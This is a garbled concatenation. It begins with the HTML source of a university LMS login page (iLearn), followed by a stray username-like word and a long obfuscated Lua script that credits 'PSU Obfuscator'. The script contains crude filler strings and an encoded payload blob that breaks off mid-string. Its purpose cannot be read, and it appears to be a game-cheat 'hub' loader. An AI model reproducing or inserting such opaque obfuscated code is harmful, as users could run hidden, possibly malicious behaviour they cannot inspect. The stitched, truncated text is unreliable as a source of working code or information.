src="https://ilearn.mq.edu.au/theme/yui_combo.php?r1487942275&rollup/3.17.2/yui-moodlesimple-min.js&rollup/1487942275/mcore-min.js"></script><script type="text/javascript" src="https://ilearn.mq.edu.au/theme/jquery.php/r1487942275/core/jquery-1.12.1.min.js"></script> <script type="text/javascript" src="https://ilearn.mq.edu.au/lib/javascript.php/1487942275/lib/javascript-static.js"></script> <script type="text/javascript"> //<![CDATA[ document.body.className += ' jsenabled'; //]]> </script> <div id="nice_debug_area"></div> <header id="page-header"> <div class="container"> <div class="login-logos"> <div class="mq-logo"> <a class="login-logo" href="http://ilearn.mq.edu.au"><img alt="Macquarie University" src="https://ilearn.mq.edu.au/theme/image.php/mqu/theme/1487942275/login-logo"></a> </div><!-- /.mq-logo --> <div class="ilearn-logo"> <a class="login-logo-ilearn" href="http://ilearn.mq.edu.au"><img alt="iLearn" src="https://ilearn.mq.edu.au/theme/image.php/mqu/theme/1487942275/ilearn-logo"></a> </div><!-- /.ilearn-logo --> </div><!-- /.login-logos --> </div><!-- /.container --> </header><!-- #page-header --> <div id="page"> <div class="container" id="page-content"> <div class="login-wing login-wing-left"></div> <div class="login-wing login-wing-right"></div> <h1 class="login-h1">iLearn Login</h1> <span class="notifications" id="user-notifications"></span><div role="main"><span id="maincontent"></span><div class="loginbox clearfix twocolumns"> <div class="loginpanel"> <h2>Log in</h2> <div class="subcontent loginsub"> <form action="https://ilearn.mq.edu.au/login/index.php" method="post" id="login" > <div class="loginform"> <div class="form-label"><label for="username">Username</label></div> <div class="form-input"> <input type="text" name="username" id="username" size="15" tabindex="1" value="" /> </div> <div class="clearer"><!-- --></div> <div class="form-label"><label for="password">Password</label></div> <div class="form-input"> <input type="password" name="password" id="password" size="15" tabindex="2" value="" /> </div> </div> <div class="clearer"><!-- --></div> <div class="clearer"><!-- --></div> <input id="anchor" type="hidden" name="anchor" value="" /> <script>document.getElementById('anchor').value = location.hash</script> <input type="submit" id="loginbtn" value="Log in" /> <div class="forgetpass"><a href="forgot_password.php">Forgotten your username or password?</a></div> </form> <script type="text/javascript"> $(document).ready(function(){ var input = document.getElementById ("username"); input.focus(); }); </script> <div class="desc"> Cookies must be enabled in your browser<span class="helptooltip"><a href="https://ilearn.mq.edu.au/help.php?component=moodle&identifier=cookiesenabled&lang=en" title="Help with Cookies must be enabled in your browser" aria-haspopup="true" target="_blank"><img src="https://ilearn.mq.edu.au/theme/image.php/mqu/core/1487942275/help" alt="Help with Cookies must be enabled in your browser" class="iconhelp" /></a></span> </div> </div> </div> <div class="signuppanel"> <h2>Is this your first time here?</h2> <div class="subcontent"> </div> </div> <script> dataLayer = []; </script> <!-- Google Tag Manager --> <noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-MQZTHB" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-MQZTHB');</script> <!-- End Google Tag Manager --> </div> </div><!-- /.container #page-content --> </div><!-- /#page --> <footer id="page-footer"> <div class="container"> <ul class="page-footer-ul"> <li><a href="http://help.ilearn.mq.edu.au/" target="_blank">iLearn Help and FAQ</a></li> <li><a href="https://oneid.mq.edu.au/" target="_blank">Forgotten your password?</a></li> <li><a href="http://status.ilearn.mq.edu.au/" target="_blank">iLearn Status</a></li> </ul><!-- /.page-footer-ul --> <div class="login-footer-info"> <p>If you are having trouble accessing your online unit due to a disability or health condition, please go to the <a href="http://www.students.mq.edu.au/support/accessibility_services" target="_blank">Student Services Website</a> for information on how to get assistance</p> <p>All material available on iLearn belongs to Macquarie University or has been copied and communicated to Macquarie staff and students under statutory licences and educational exceptions under Australian copyright law. This material is provided for the educational purposes of Macquarie students and staff. It is illegal to copy and distribute this material beyond iLearn except in very limited circumstances and as provided by specific copyright exceptions.</p> </div><!-- /.login-footer-info --> <div class="login-footer-link"> <div class="bootstrap-row"> <div class="col-md-7"> <p>© Copyright Macquarie University | <a href="http://www.mq.edu.au/privacy/privacy.html" target="_blank">Privacy</a> | <a href="http://www.mq.edu.au/accessibility.html" target="_blank">Accessibility Information</a></p> </div><!-- /.col-md-7 --> <div class="col-md-5"> <p>ABN 90 952 801 237 | CRICOS Provider 00002J</p> </div><!-- /.col-md-5 --> </div><!-- /.bootstrap-row --> </div><!-- /.login-footer-link --> </div><!-- /.container --> </footer><!-- /#page-footer --> <script type="text/javascript"> //<![CDATA[ var require = { baseUrl : 'https://ilearn.mq.edu.au/lib/requirejs.php/1487942275/', // We only support AMD modules with an explicit define() statement. enforceDefine: true, skipDataMain: true, waitSeconds : 0, paths: { jquery: 'https://ilearn.mq.edu.au/lib/javascript.php/1487942275/lib/jquery/jquery-1.12.1.min', jqueryui: 'https://ilearn.mq.edu.au/lib/javascript.php/1487942275/lib/jquery/ui-1.11.4/jquery-ui.min', jqueryprivate: 'https://ilearn.mq.edu.au/lib/javascript.php/1487942275/lib/requirejs/jquery-private' }, // Custom jquery config map. map: { // '*' means all modules will get 'jqueryprivate' // for their 'jquery' dependency. '*': { jquery: 'jqueryprivate' }, // 'jquery-private' wants the real jQuery module // though. If this line was not here, there would // be an unresolvable cyclic dependency. jqueryprivate: { jquery: 'jquery' } } }; //]]> </script> <script type="text/javascript" src="https://ilearn.mq.edu.au/lib/javascript.php/1487942275/lib/requirejs/require.min.js"></script> <script type="text/javascript"> //<![CDATA[ require(['core/first'], function() { ; require(["core/notification"], function(amd) { amd.init(1, [], false); });; require(["core/log"], function(amd) { amd.setConfig({"level":"warn"}); }); }); //]]> </script> <script type="text/javascript"> //<![CDATA[ M.yui.add_module({"mathjax":{"name":"mathjax","fullpath":"https:\/\/cdn.mathjax.org\/mathjax\/2.6-latest\/MathJax.js?delayStartupUntil=configured"}}); //]]> </script> <script type="text/javascript" src="https://ilearn.mq.edu.au/theme/javascript.php/mqu/1487942275/footer"></script> <script type="text/javascript"> //<![CDATA[ M.str = {"moodle":{"lastmodified":"Last modified","name":"Name","error":"Error","info":"Information","namedfiletoolarge":"The file '{$a->filename}' is too large and cannot be uploaded","yes":"Yes","no":"No","morehelp":"More help","loadinghelp":"Loading...","cancel":"Cancel","ok":"OK","confirm":"Confirm","areyousure":"Are you sure?","closebuttontitle":"Close","unknownerror":"Unknown error"},"repository":{"type":"Type","size":"Size","invalidjson":"Invalid JSON string","nofilesattached":"No files attached","filepicker":"File picker","logout":"Logout","nofilesavailable":"No files available","norepositoriesavailable":"Sorry, none of your current repositories can return files in the required format.","fileexistsdialogheader":"File exists","fileexistsdialog_editor":"A file with that name has already been attached to the text you are editing.","fileexistsdialog_filemanager":"A file with that name has already been attached","renameto":"Rename to \"{$a}\"","referencesexist":"There are {$a} alias\/shortcut files that use this file as their source","select":"Select"},"admin":{"confirmdeletecomments":"You are about to delete comments, are you sure?","confirmation":"Confirmation"},"block":{"addtodock":"Move this to the dock","undockitem":"Undock this item","dockblock":"Dock {$a} block","undockblock":"Undock {$a} block","undockall":"Undock all","hidedockpanel":"Hide the dock panel","hidepanel":"Hide panel"},"langconfig":{"thisdirectionvertical":"btt"}}; //]]> </script> <script type="text/javascript"> //<![CDATA[ (function() {M.util.load_flowplayer(); setTimeout("fix_column_widths()", 20); Y.use("moodle-core-dock-loader",function() {M.core.dock.loader.initLoader(); }); M.util.help_popups.setup(Y); Y.use("moodle-core-popuphelp",function() {M.core.init_popuphelp(); }); M.util.js_pending('random58b8dd8d3abcf2'); Y.on('domready', function() { M.util.move_debug_messages(Y); M.util.js_complete('random58b8dd8d3abcf2'); }); M.util.js_pending('random58b8dd8d3abcf3'); Y.on('domready', function() { M.util.netspot_perf_info(Y, "00000000:0423_00000000:0050_58B8DD8D_30F8F6D:3B0C", 1488510349.1968); M.util.js_complete('random58b8dd8d3abcf3'); }); M.util.init_skiplink(Y); Y.use("moodle-filter_glossary-autolinker",function() {M.filter_glossary.init_filter_autolinking({"courseid":0}); }); Y.use("moodle-filter_mathjaxloader-loader",function() {M.filter_mathjaxloader.configure({"mathjaxconfig":"\nMathJax.Hub.Config({\n config: [\"Accessible.js\", \"Safe.js\"],\n errorSettings: { message: [\"!\"] },\n skipStartupTypeset: true,\n messageStyle: \"none\",\n TeX: {\n extensions: [\"mhchem.js\",\"color.js\",\"AMSmath.js\",\"AMSsymbols.js\",\"noErrors.js\",\"noUndefined.js\"]\n }\n});\n ","lang":"en"}); }); M.util.js_pending('random58b8dd8d3abcf5'); Y.on('domready', function() { M.util.js_complete("init"); M.util.js_complete('random58b8dd8d3abcf5'); }); })(); //]]> </script> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"d6bb71fb66","applicationID":"3373525,3377726","transactionName":"YVMHYkVQWkIAUERQDFgZMEReHlheBlpeFgpYUgBOGUFcQQ==","queueTime":0,"applicationTime":48,"atts":"TRQEFA1KSUw=","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html>
Abutalha1
local u=(function(n,e)return(n==e);end)local o=(function(e,...)return e(...);end)local H=(function(n,e)return(n*e);end)local e=(function(n,e)return(n<=e);end)local L=(function(e,n)return(e~=n);end)local I=(function(e,n)return(e-n);end)local U=(function(n,e)return(n/e);end)local e=(function(e,n)return(e<n);end)local e=(function(e,n)return(e>=n);end)local q=(function(e,n)return(e+n);end)local Z=(function(e,n)return(e..n);end)local e=(function(n,e)return(n>e);end)local P=(function(e,n)return(e^n);end)local d0=(function(e,n)return(e%n);end)for n,e in pairs({(function(d,...)_7d9f39c5985df7ea="This file was obfuscated using PSU Obfuscator 4.5.A | https://www.psu.dev/ & discord.gg/psu";local V=_7d9f39c5985df7ea local C=d.dB5cI;local c0=d[((#{415;(function(...)return 382,600;end)()}+152097728))];local R=d[((#{377;185;574;216;}+820216899))];local h0=d[((733024120-#("buy strawberry hub")))];local g=d[(119983808)];local f=d[((532727354-#("Server boosters can add meme strings")))];local s=d[((958828681-#("stop submitting junk!!!!!")))];local f0=d[(755710076)];local J=d[(883095581)];local s0=d[(748584656)];local b=d[(975148219)];local r=d[((334855223-#("perth")))];local m=d[((#{504;539;}+576117041))];local a0=d["PNDZgira"];local t0=d[((#{177;269;665;124;}+139271852))];local i0=d[(431083945)];local D=d[(677101205)];local r0=d.YYLFDt9Fo;local o0=d[(372297710)];local S=d.BhLIjsO7R;local n=d[((#{522;500;436;383;}+480434856))];local x0=d[(918797337)];local y=d[((168487397-#("Jason Jackson Tanson")))];local l=d["Xww6et6v"];local z=d[((#{541;594;389;}+125395508))];local x=d[((#{731;}+270656790))];local X=d[((870664670-#("Never gonna give up")))];local w=d[((#{330;366;}+661139226))];local t=d[((#{863;}+105926486))];local N=d[((#{318;(function(...)return 438;end)()}+469071918))];local Q=d["QfrNfGpk"];local B=d["eZtWPM"];local p=d['qYEqVwYq'];local M=((getfenv)or(function(...)return(_ENV);end));local h,i,e=({}),(""),(M(n));local a=((e["\98"..d[C].."\116\51\50"])or(e[""..d[f].."\105\116"])or({}));local c=(((a)and(a["\98\120\111"..d[b]]))or(function(e,l)local n,o=n,s;while((e>s)and(l>s))do local a,d=e%x,l%x;if a~=d then o=o+n;end;e,l,n=(e-a)/x,(l-d)/x,n*x;end;if e<l then e=l;end;while e>s do local l=e%x;if l>s then o=o+n;end;e,n=(e-l)/x,n*x;end;return(o);end));local E=(x^S);local k=(E-n);local T,Y,_;local G=(i["\99"..d[g]..d[t]..d[b]]);local E=(i["\103"..d[B].."\117\98"]);local D=(i[""..d[f]..d[D]..d[l].."\101"]);local E=(i["\115\117"..d[f]]);local O=(e["\109"..d[t]..d[l]..d[g]][""..d[N].."\108\111\111"..d[b]]);local n0=(e["\112\97"..d[C]..d[b].."\115"]);local l0=((e[""..d[w].."\97\116\104"]["\108\100\101"..d.kmQESjn..d[p]])or(function(n,e,...)return((n*x)^e);end));local j=(e["\112"..d[y]..d[t].."\108\108"]);local F=(e[""..d[l]..d['kxIH4lS37o'].."\110\117"..d[w].."\98\101"..d[b]]);local i=(e["\114"..d[t]..d.VESf4zl..d[B].."\101"..d[l]]);local v=(e[""..d[B]..d[l].."\114\105"..d['znBHRjlwJN'].."\103"][""..d[w].."\97\116"..d[y]..d[g]]);local W=(e[""..d[B].."\101\116\109\101"..d[l].."\97"..d[l]..d[t].."\98\108"..d[r]]);local i=((e["\117"..d['znBHRjlwJN']..d[p].."\97\99"..d[R]])or(e[""..d[l]..d[t]..d[f].."\108"..d[r]][""..d["kdry1qPA"].."\110"..d[p]..d[t].."\99\107"]));local K=function(l,n,e)return e+n or l*e end;local R=(e["\115"..d[r]..d[m]..d[r].."\99\116"]);local p=(e["\116\121"..d[p]..d[r]]);local e0=(a[""..d[f].."\110\111\116"])or(function(e,...)return(k-e);end);T=((a["\108"..d[B]..d[g]..d[C].."\102"..d[l]])or(function(n,e,...)if(e<s)then return(Y(n,-(e)));end;return((n*x^e)%x^S);end));local p=(a[""..d[f].."\111"..d[b]])or(function(e,n,...)return(k-_(k-e,k-n));end);_=(a[""..d[f].."\97\110"..d[J]])or(function(e,n,...)return(((e+n)-c(e,n))/x);end);Y=((a[""..d[b].."\115\104"..d[C].."\102"..d[l]])or(function(n,e,...)if(e<s)then return(T(n,-(e)));end;return(O(n%x^S/x^e));end));if((not(e[""..d[f]..d[C].."\116\51\50"]))and(not(e[""..d[f].."\105"..d[l]])))then a["\98\111\114"]=p;a[""..d[m]..d[B].."\104"..d[C]..d[N]..d[l]]=T;a["\98"..d.znBHRjlwJN..d['kxIH4lS37o']..d[l]]=e0;a[""..d[b]..d[B].."\104\105"..d[N]..d[l]]=Y;a["\98"..d.kmQESjn..d["kxIH4lS37o"].."\114"]=c;a["\98"..d[t]..d["znBHRjlwJN"]..d[J]]=_;end;local x=(e[""..d[l].."\97"..d[f].."\108"..d[r]]["\114"..d[r]..d[w].."\111"..d[o0].."\101"]);local B=""..d.C9t1IkCl..d[X]..d[s0].."\100"..d[f0].."\41\58";local p=(e[""..d[l]..d[t]..d[f]..d[m].."\101"][""..d[y].."\111\110\99"..d[t].."\116"]);local w=(((e["\116"..d[t].."\98"..d[m]..d[r]][""..d[y]..d[b].."\101"..d[t].."\116"..d[r]]))or((function(e,...)return({i({},s,e);});end)));local x=(e["\116"..d[t]..d[f]..d[m]..d[r]][""..d[C].."\110\115"..d[r].."\114\116"]);e[""..d[f]..d[C]..d[l]..d[r0]..d[i0]]=a;local e=((-z+(function()local o,l=s,n;(function(l,e,n)e(e(e,n,n),e(e,e,n and e)and e(e,n,e),n(l,e,n))end)(function(x,e,d)if o>t0 then return d end o=o+n l=(l-x0)%a0 if(l%c0)>=Q then return e(e(d,e,e and e),e(d,e,e),d(e,d,x)and x(e and e,x,e))else return x end return x end,function(x,d,e)if o>h0 then return e end o=o+n l=(l+(558))%(8816)if(l%((270-#("no homo is loving guys as a guy homo"))))>(117)then return e(e(x and x,d,x),e(d,d,e),x(x,e,d))else return e end return x end,function(d,e,x)if o>(345)then return x end o=o+n l=(l-((#{(function(...)return 173,256,967,628,...;end)(372,654,191,38)}+534)))%((4593-#("pussy popping")))if(l%(888))>(444)then l=(l*(796))%(44969)return e else return x(d(e,x,d)and e(e,x,d),d(d,d,e),x(d,e,e))end return x(e(x,e,x),e(e,e and x,e),x(x,e,d and e))end)return l;end)()));local x,l=j(function(e)local x,l=e()local o,e=x(e(F),l)local x,l=x(K,s,nil,l)return F(v(l,B))-F(v(e,B))+n end,function(e)if e then return function(e)return e()end else return j,''end end) local a=(#V+((#{37;577;994;}+162)));local f,A=({}),({});for e=s,a-n do local n=G(e);f[e]=n;A[e]=n;A[n]=e;end;local b,x=(function(x)local l,o,d=D(x,l,((#{389;(function(...)return 392;end)()}+1)));if((l+o+d)~=(248))then e=e+(9);a=a+(184);end;x=E(x,((#{396;316;518;}+2)));local l,o,d=(""),(""),({});local e=n;local function c()local l=F(E(x,e,e),(36));e+=n;local n=F(E(x,e,e+l-n),((#{229;}+35)));e+=l;return(n);end;l=A[c()];d[n]=l;while(e<#x)do local e=c();if f[e]then o=f[e];else o=l..E(l,n,n);end;f[a]=l..E(o,n,n);d[#d+n],l,a=o,o,a+n;end;return(p(d));end)("PSU|22p1E102762771012122781414276111p1o27810112152151127811131327O2771121b21a27J27P1312161627626n26C1b2762241z1C121D21o21o1d1O1s1N21S21M1827622021P1O1C1F11161D2301F1727622828F28h1N1126G2421927621v217191J1J121n1h28j21I27e1022v161C181k23c2971022f21i1D1721K1Z1l27K23028M27K27h27J1I1q191127D2761x21A1E1127A11112ac2ae27F2aI2ad27q27S2am2aE2Ah2ah1h21F1Z27t151527v27x27Y2771e1e1F1f27622K22f2871028928b28D29128I21a2281C2762261x1R1T2b61A121l1T161122u2bt27622c21D19191L1v2bu22C23421D1J1622C1i1i2372121M10162cH1L1J1p101l22G24G23l2B225c21v26A22Z21622U23Z24A1J22L1Q28y1029028g28I1121022F27j26O25R23C22F1g28N28P28R28t1D21I21p101r2102C91623B25I24021c25621623l26L22h22j248132762321b1I21C21t2831021v1521G1J29n1y22629R29929B29D29f28J21G2ed21v21b131S1M22322n23929j29L29n1923L26y2281724G24H1C1d22K1s27F2a42782a628m1d1d2AB21A2B72ay2fn2B72782AC2b71b2BB2fu10172D52a62a81a1A2Fn2ae2C22AH1I2cJ122aa102GA1N132B42762gA1g14182A22GA1H1527R2GJ162Ga2GS2ge161j172822gt1s182h12GX1T192gw2ga1U1A2H9161V1B2hd28q2H52gA1P1D2gw1121f21f27T2Fl2au1y27K112G41121821927j1X172122HV2GT1m27A27B2gx2gg1c2Bk27K21I21j27727r2b02b22b32B52fS22K22N2E6102e82Ga23b2Et2eG2ei18231132BB2bD28C28e2d81N26R22623021t1T26p21s1Z21924v26H2ET2ev2EX22325d26g2D52d72921121T1y2DI1028O28q28S28U2Do2DQ2DS2cA24X25d2f229M29O23h2ID2bm2Bo2BQ2Bs2bU2af2302b21O2392401922Z26I1126U21U2342552em29a29C29E29G26H2512B12c02C22C42C62C82CA22C29C2Cf2ch2cJ2CO2CM2CO22G112FM2781d22r29a1h1429g22A1I24923z26m26A25k23S23k24W1o1N2Dc2782de1Z2ff2a327I2fi1Q28M2G02FR102FQ102FY27A2MD2Fw2MD2hJ2a72As2g627t2g92gB2hd2Gg2FL2GT2GL2g42GT2Gq2c22gt2ga2n12gX2gz2gI2gx2h32N72gA2H72n42Ha1a2ND2He1B2ng28Q2nA162Hl2n42ho2hQ2762hS21f2Hu2aS2Ah2hz2I12i3102GN2i6122Ic2GT2gg2gd112IF2ih27s27w2ik2762B42cd2842JH2982Iw29n21321U2B2181e2ji2EW2eY26z23Q1522o1M1w1026o2272582701O25z23325d24424a25s23K22U21q1r1Z23N21k23125225f2282oW2oy2P025R25S26E2kU2eo2KX1n24826i2DD25r26y2K52762F31824g27221n2bz2c12C32c52CB2L62cB1k1K1823221b171f1d2242Qe22l192LA2CI2ck2lE2cp2Lh27j2lk2lm2lO1n2LQ1021q2ka2bN2bp1f2Br2BT2Bv21L26w25q23K24E23d21F22v1i21d22P2ju2jW2dl2jz2dP2dR2Dt24U25t2J128A2j32BG1N26H24C2Jo2S02AF2362IQ2is26922Z1926u27S1023K21Q24i2m627g2M82772fJ102N42fy2b62MD2N72Fy2MC2Mg2fo102mv2Ge2MN2ft2aN1G1g2MR2I72GD2gf132O42GX2gl2mf2Gp151h1h2N22Bv27T2Ga2Gz2hj162H32aH2gt2H72O12Gx2HB2Tr2gx2HF2Hh1c2Tx2hK1d2Th27F2hP2hR2U42Nt2i527k2nx2fT2NZ2Mk2GX2i72MY2ia2802i92O82IG2762II2oC2od2of1i27621923222Z21a28321s22D21624K2402RX2BE2J429224Y26s1y25a23s2561Q24V26n25k2hg2E72e92382P31i26p1v22W23926a1222P26C21O29j21626J25b24I2VX2vZ22z23w29I2q32k72722s328z2S526D21l22P2731h26z1123f2692202oq2982jj2Ey2512L02q92l32Qc2c72DT2cC2cE2cg2QT2LD2cn2QW2Li2772QZ192lN2lp1J21U2K92bL2R72KD2rB1124R25x2RO2DK2jY2dN2rs2K21626T2cs2m325R23z2kT2982KV2EP29g26C25X2uY2V022D24q2532wp2ee2Ok1823D2Sj2Fh2sM2ma2Fz2D52fy2tu2fY2tx2Sq2fS2fY2sZ2g2112U52Sw2Ae2iI112Ga2T729j2t92Mi2Tc142NG2GQ2tO2gA2tO2N62752N82op2Ze2nB29r2gt2HB2Te2Nh2t42GT2nK2ZH2NM1D2Mf2np2U82ht2Hv2Th2HY2i02uE2i42tb2z1122Ug2t92uj2uN2oa2IJ2US1E2zo1021e2jT2DJ2jX2DM2k02rT2CA21i2oN27Y22k22g2K629n25Q2H021P22025224Q24X24Y23R2232r62Kc2R92Ke2bV26N1821q23d23523M26522O21S25k28X2wD2J51125226j2l12Qa2l42qD2Wz2L92X22lc2cL2X52LG2x72Nr2Ll2xA2R122A1J112es2oj2EH29N25x2xZ2Ee2y12pV24n23a25z24D25222522j1u1N12310q2772DE25523p2S82E924I25x2dD22721024D2oR2Jk21F1M2v62rZ2j52322Yg2sl2Gj2Yj2z52FY2h52yq2md2sp2sx2m92A82Yn2an2iC2t6122mT132Uj2gK142zm2Gq2U22gu1631072gY1731432H331462h731432tW2TL2nh314328Q31432hL2Sz2ZV2Nr2U92nu112Gn31002nY2i42T82GB2sV2t92n7310A2uP2oB2B12Ik2b4310F22K2242Xn310K2Rr2K12dt22X1p310U1827224731162r82Ra2KF23o21u21322726724H21t23d25I23124124e26221324524q23A22e1025c2pZ22R22J2s4311N24M31312M3227242310127J2b9313a2bf2j524O2692q8102l22Qb2l52wz2QG2Qi2qk2qm2qo2dt2Qq2Qs311y2qv31212qY31242xB2r21i23222i2Iv312C1821L317d2Wq2oS22321925T23f23M25023E24Z21d2132632E52vl1i26K2962Y02Pu2Eq313D2fG313F2T028m2yp2Sx313k2SX313N2B72sR2sW2Fs2YI2a82UG2aJ112b4313U313W2yT162GL314V2Gq2tu2Ga2Ga318v31472Zm2H3318Y2h72zm2Hb318Y2hF314X1628Q318y2HL2tU314m2Sy314O2HV2FW314s31022792i93105313y162IB2Id3150102UQ31532B22B429c27625C2521W26h21t25d26x24b26a23J31672Xw22r2ja2Wv316t311U2l72Cd31732qu31201j312A2EE2wr2231324324T24g26l1I22b23T22e21y23l316b2Jq21D1e22r21528325i24B22q1I22623M21n26d21m1C22N1m24q21026p1u1x3166317y23D21W312y1i23322J26421y22U21v131g22823j132491E22C101w26r26l22Q3158310J2RQ2Xq315c2cA21f224316L2V828I2331R317E2Ix23c1H315K2XI2kf23l2Ps31812Kw2eq21c1e2441G23b22n23f26423R24c310T2W929N2Yf31852A52yj2OG318g2Me152MD2sz2fY310F2fy31042mn2st2An2g82Z0314W2G1319p132Yw313z318t15318Y2Ga2Fi3147319O2TQ314F2Tt2gO162hb31462Hf314628q319O2HL2h5319E2NS314p318n2Ud2772I22I4318f31052z52t92hN2o93151310C31541E319Y1028w31bE31Bg31bi1M22l31cR312b2iX25q1l31aT31AV31aX22E1L316E312U25R22R31cf2jV2xO310L2Xr2Dt24h24j31a231a431A626a21q25e31bY31c031C222825V24I31BN31Bp25C317y26j1M31C731C931CB26L24o26231d631d831Da23R23424z31Bu1R1W31b631b831BA1d2r52xG3117315M2bv22U311l2d62s521t21N2Pt31D229G132iU317j2jK26j2601T31aE311t2wy2l7311W2Lb31AK2Lf24N23M315G1K23E31cN2S031842M731dJ28m2yW2YS2lI2fY31dl2fY31Dw2B72T82Mn31892aE2HX31dZ2i731ea2gg2NG2gl31F0162Gq31982Ga2zM2tN2eD2ga2H32hd2H73198319531eG2hF318y2hI31ix2ZS2ug31Eq319g2nV319j31eV2nZ31042gB310F2T9318f319S319u2oD10319X1J27626i24c31G231A531A722T25y31CW31182xJ24u31C631C831cA31Cc22Q31DE29K2k723z23T31fB31BH31Bj24524631g831C131c31K24r2pz24p22G31gE31BQ26k22A25U31fL31aw31aY1q26131BU2eB31362eY26j25F31CS29n21L316A311m2Jq23f2BY316r311S2wX2Qe22C2QG31AJ2X42lF25623V315931CH310m2xS21Y21L31i12J51u31GY31B71031B922q21322c31gq31D931DB21b31D0312G318229G31i32sK31I5319T2iQ31Dt2id313l31Dm31ib2sX2nA2mn318k31DX2a831IK2Gc2z331E231e4318R2gm31eg31Is31E131E92SM318z31Do2ZF2TO31J131e12hb31iq2Hf31IQ28q2ZM2HL310f31jb2zX2AH319I31EU2ab2nZ31432i7318q2Gg310931f331Mh31F5319w31f731JR1026N2jn31LB2D921021G31kE31fD25y21431KW31FN2Vj31Bu1W1X31jV31g421023q31hN31Lf2Ww316U31AH2X131ht31Lm2cP1J31h3102kb315l31191125025m31lq2xP31LS31FZ31FQ2762dE23Z25731Lw29221S31AN2Eu317k26m1e31Kr31gG26k22X24431gK31k631gn25X31kj31ga21Q25P31gZ31M131bA23H31D531D731M723r21y23z31he2Y21n25E25231L72q52Q231ka31DG313e31MG31Mn318h313m29R31dr2jU2su2g12Mn31I72AN2yZ310531432Gg31ey31mz31IQ2GQ31462ga314v2GZ318Q319131Eg2H731462Hb31jH2hf31jh28q318Q2HL314Z2U7314N31Nl2yv1h31jE31NP2I42TO2i72ZM31NU2g52Ie2uO31Nx2uR2ik2AY2N724w2542A221Y2151821G2132CL1624b26b31K031H61126631S62882112B51s1t171922d31an31s8181y2171A28w2D522U1K1t1221r1l1526124F315g2wB2d521t2181F1b1c1B1q25031aa27621S25r25r172ec29821827R1t21T22s2m227626823Z21B25I23k31L322326s25d1R27621y21f2Cn22423031sn1F31sP31sR21Z31ll311Z2LF24125a2Ze21V31TU131T1x21N111F1i2171b21n1V2182252TI2eE31Ut31Uv31Ux31uZ2171T21931Ua1r1221x21431dI2m928M2mf2mH319M2Mn313R2AE27d313u2nG31IN29R313z2NO31RL1027d31Rn2822Sn31vo2SX31f031Vr2a2318L31VU31mU31Vw1331io2Z729r319E31w32UA2AH2fl31W631N731vp313G313Q31Wb2An31WD310531wF31WH31W02NQ31W22Lo31wm112IC31WP2mD2z521d1421h2YK27r31x731dm31X931Xb2YK27f31nO2Mg31nq314F2i7314631RW27f31nw31jn2Od27d2gW26226431u624o2491v31TT1V1922H31UG171522322s2191Q1G1C1T1m21W31um31752151431sH31P122X2d531Mf27p31XL31ew319L2O231qy2IQ31xS31Rz31Xu27821H21h314027o22k31LA1022b2131H29Z1l1125A25Z2LI31UC31ue31Ug31So31SQ1921N31Z922e21f319P2BO21s26V25K2LI2262171h131o1T1P2122182CM1E1N25325Y31O1236171r21D2181m2cj171N21m21L1J1R1d1n2Kf22u1129R21U2191b1t21R2151t1H1624g25E31t131t331t531t724T26f2A222V122TI2LN1C1u21g2272a22371m2tI31zO1k232315F27623816171g23u286276321P32151N31401b2aF1l22s2d427631YQ18172Bk1225131l02Q3181B25w24h31v7235142t41g21M21c1121d320131Op1622X1L2a222B21p111o22f22W21p1N26c31hX321W1D2c325x25029J31H81r1n21l22h31n722821D1F2D424c2Oi1022P18142qm1R21f22531rx22a2131r21P21I32261v1a1623C1D2ju22r27A1b1D21m21i172m02zT2Zt1L1h26B23w31Rx21Z21e1S324M324B324D1K23831n722u2HC101t25325o29R22a21n31so21f21H1r1p251325B27623b1i171H1S29n1e1h2Rv2J121L1K21e21I321r31SR1k1223f31Rx2302gh151n2h01r31SR31ZQ2d5321g32251B1O24Z26F2hU31V831Y531y721131y922322R21I321Y31vh225237324a14324C1621x23f1D22S31bV1x2bS21021829q322d1Q21821o324J1d1121k31z92JP2D912327c323x1k111r1S326C2Dq22X1n31RX23131061d1f1v1U1I2Bo1222q31O132242172171S1Q32261521N29U1131tj1T1T1d2462692Ze21U21c1R181F21p2cg181O21121f328N25h2532D522P323t1T2GN1421631cm27631Zb16326C1921D21j1d1P1g231162zE21Z1Y1H21C1x1m1G31451a15323t1724c27231V722B21E1O21g2142CH2Ga1221J21J1K322s1m1724b2682fs316s31HP31LI1k263323w22R29g14324s1y2dH27622d2cg1N21n2131u2Az213326Z327124G325l1023b320427H31e32811K2F127622q2fm1326V31om2uv31772r02LP2cd23332782x627j252252310132AN31LH316v2Qh2qj2qL2qN2qP1931222Sy317831262xD22j21627622W2Ff1422229Z22G27622h22k328N1e131n22e22528b21U2262uu321Q22j1g22e1D22H1b16132h01527A151724u2452ZE22A21J18121r1H1z21f320R320t2Bv1v2Rn31UB21b151O29G329h31sx1f2gH2A821k2Ba276329R1H21J2171131E71m1N1B22U1c29J22621B29N2312Zt329E21N323G102522652D52en1F19121122E31Hd27622e142o832511623u32a427632dj1l1S152ra31rp21j32471t2ca1224G25V2ch316r28f21X23b21Q1T32Eg2202382121J18151v22b32BV2bS22g23h31k9224326Q1B27231353223320K1H320G23L31O431v832fW1y324Y24Z25U2A232gB31zn31sR26924m2OZ31oO31aF31HQ2cB29c32cB2x931792LQ21V31Hi29K321h319P1223e31FG1022R2u11D2bs24U322k102371A1N24r25i31BU324E29r29t29V29x29z11230329P28Z1Y1N323z1S1o326X21C1h325i314032Bj32bc1m1J1S266323j325M1M181T1o2kH27723k25v1J23621h2D52C01t1c21I2191N25K31qd28N2152R9181921l22M2i922n1O24O321e2q3321H29F1T2FF21b317i1021w2I21G1R1Q25225c31n722c32G032g224p31L631tt31TV21T26432JH1022121331SQ1l2qm1622F32iW318129z31rp23D21J32ch1032CJ31w232cM1032co1032cq32Cs32Cu32cW32cY32D01032D232D432D632d8280313x314r1821S2S72bZ21h1324N31ZY2762311C1A1e21m214152bO1l32e423U31sg32231I1N2eI1732KB32Kd21L22c2a22392cj1n1m151L1l1G31I02q932iZ32b